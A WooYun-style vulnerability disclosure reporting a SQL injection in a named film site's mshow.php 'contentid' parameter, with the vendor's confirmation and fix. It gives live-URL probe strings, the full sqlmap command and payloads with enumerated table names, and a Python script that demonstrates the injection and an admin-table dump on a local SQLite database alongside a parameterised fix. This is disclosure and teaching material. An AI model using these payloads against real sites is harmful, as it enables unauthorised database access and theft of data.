WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-03-08: Details reported to the vendor, awaiting the vendor's response
2014-03-14: Vendor has confirmed; details disclosed to the vendor only
2014-03-24: Details disclosed to core white hats and relevant domain experts
2014-04-03: Details disclosed to regular white hats
2014-04-13: Details disclosed to intern white hats
2014-04-22: Details disclosed to the public
m1905.com main-site SQL injection, which can lead to full disclosure of the database. I used SQLMAP to retrieve database table names (table names only) to demonstrate the impact and did not go any further; please confirm and fix as soon as possible.
Vulnerability location:
http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file
First, a rough check with and 1=1 versus and 1=2 to get a feel for whether the parameter is evaluated by the database:
http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file
http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file
Then use SQLMAP to obtain database information (demonstrating table-name retrieval only; going no further):
C:\Users\Administrator>sqlmap.py -u "www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: contentid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file
---
back-end DBMS: MySQL 5.0.11
Database: ucenter
[1 table]
+---------------------------------------+
| uc_vars                               |
+---------------------------------------+

Database: cms
[273 tables]
+---------------------------------------+
| HdVideoEncode                         |
| cms_admin                             |
| cms_admin_role                        |
| cms_admin_role_priv                   |
| cms_ads                               |
| cms_ads_place                         |
| cms_ads_stat                          |
| cms_announce                          |
| cms_area                              |
| cms_ask                               |
| cms_ask_actor                         |
| cms_ask_credit                        |
| cms_ask_posts                         |
| cms_ask_vote                          |
| cms_attachment                        |
| cms_author                            |
| cms_block                             |
| cms_c_cctv6film                       |
| cms_c_disc                            |
| cms_c_dm                              |
| cms_c_downfile                        |
| cms_c_entertainment                   |
| cms_c_film                            |
| cms_c_film_20100519                   |
| cms_c_filmtable                       |
| cms_c_game                            |
| cms_c_info                            |
| cms_c_ku6video                        |
| cms_c_live                            |
| cms_c_magazine                        |
| cms_c_mainstar                        |
…………………… many tables omitted ……………………

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Fix suggestion: validate and filter the parameter. Please confirm the vulnerability severity and repair the site as soon as possible.
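As an added illustration (not code from the original report or from m1905.com), the following Python script reproduces against a constructed in-memory SQLite database the three things the report shows: the manual `and 1=1` / `and 1=2` probe, sqlmap's UNION marker test (the page's CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671), decoded in the code), and the fix the reporter asks for (a strict integer check plus a bound parameter). The table schema, the `cms_admin` contents and the string-interpolation lookup are assumptions standing in for the real mshow.php code, which is not on the page; SQLite's `||` stands in for MySQL's CONCAT, and the trailing `#` comment from the MySQL payload is omitted because SQLite does not recognise it.

```python
import re
import sqlite3

# Constructed sample data (an assumption; the real m1905.com schema is not on the page).
# A three-column content table matches sqlmap's "3 columns" UNION finding, and
# cms_admin is one of the table names the report lists.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE content (contentid INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO content VALUES (?, ?, ?)",
                   [(1109, "Film 1109", "synopsis"), (1110, "Film 1110", "synopsis")])
    db.execute("CREATE TABLE cms_admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO cms_admin VALUES ('admin', 'hash-placeholder')")
    return db


def vulnerable_lookup(db, contentid):
    """Assumed shape of the bug: contentid is pasted straight into the SQL text."""
    sql = f"SELECT contentid, title, body FROM content WHERE contentid={contentid}"
    return db.execute(sql).fetchall()


def safe_lookup(db, contentid):
    """The fix the report asks for: validate the parameter, then bind it."""
    if not isinstance(contentid, str) or not re.fullmatch(r"[0-9]{1,10}", contentid):
        raise ValueError("contentid must be a decimal integer")
    sql = "SELECT contentid, title, body FROM content WHERE contentid=?"
    return db.execute(sql, (int(contentid),)).fetchall()


def _fetch(lookup, db, value):
    # A rejected parameter behaves like an error page: the same answer for every payload.
    try:
        return lookup(db, value)
    except ValueError:
        return None


def boolean_probe(lookup, db, base="1109"):
    """The report's manual check: if 'and 1=1' and 'and 1=2' give different
    responses, the database is evaluating the injected expression."""
    return _fetch(lookup, db, base + " and 1=1") != _fetch(lookup, db, base + " and 1=2")


# sqlmap's UNION marker from the page, as three hex literals.  Sending the marker in
# pieces means the joined string can only appear in a response if the DB concatenated them,
# so an accidental echo of the request cannot produce a false positive.
MARKER_HEX = ("7179637a71", "56546d4e704b78764d75", "7178777671")
MARKER_PARTS = tuple(bytes.fromhex(h).decode("ascii") for h in MARKER_HEX)


def union_probe(lookup, db, base="1109"):
    """sqlmap's UNION test, with SQLite's || in place of MySQL CONCAT and no trailing #."""
    concat = "||".join(f"'{p}'" for p in MARKER_PARTS)
    rows = _fetch(lookup, db, f"{base} UNION ALL SELECT {concat},NULL,NULL")
    if not rows:
        return False
    marker = "".join(MARKER_PARTS)
    return any(marker in str(cell) for row in rows for cell in row)


def dump_admins(lookup, db, base="1109"):
    """What 'full database disclosure' means in practice: read another table through
    the same hole.  Injected rows are recognisable by the NULL padding column."""
    rows = _fetch(lookup, db, f"{base} UNION ALL SELECT username, password, NULL FROM cms_admin") or []
    return [(r[0], r[1]) for r in rows if r[2] is None]


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("fixed", safe_lookup)):
        print(name, "boolean:", boolean_probe(fn, db), "union:", union_probe(fn, db),
              "admins:", dump_admins(fn, db))
```

Run stand-alone, the script reports both probes as true and dumps the constructed `cms_admin` row through the vulnerable lookup, and reports both probes as false with nothing dumped through the fixed one. The integer check alone would already stop every payload on the page; the bound parameter is there so the query stays safe if the parameter is later widened to a string.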
Severity: High
Vulnerability Rank: 18
Confirmed at: 2014-03-14 13:22
Thank you for the report.
2014-03-14: This vulnerability has been closed; thanks again.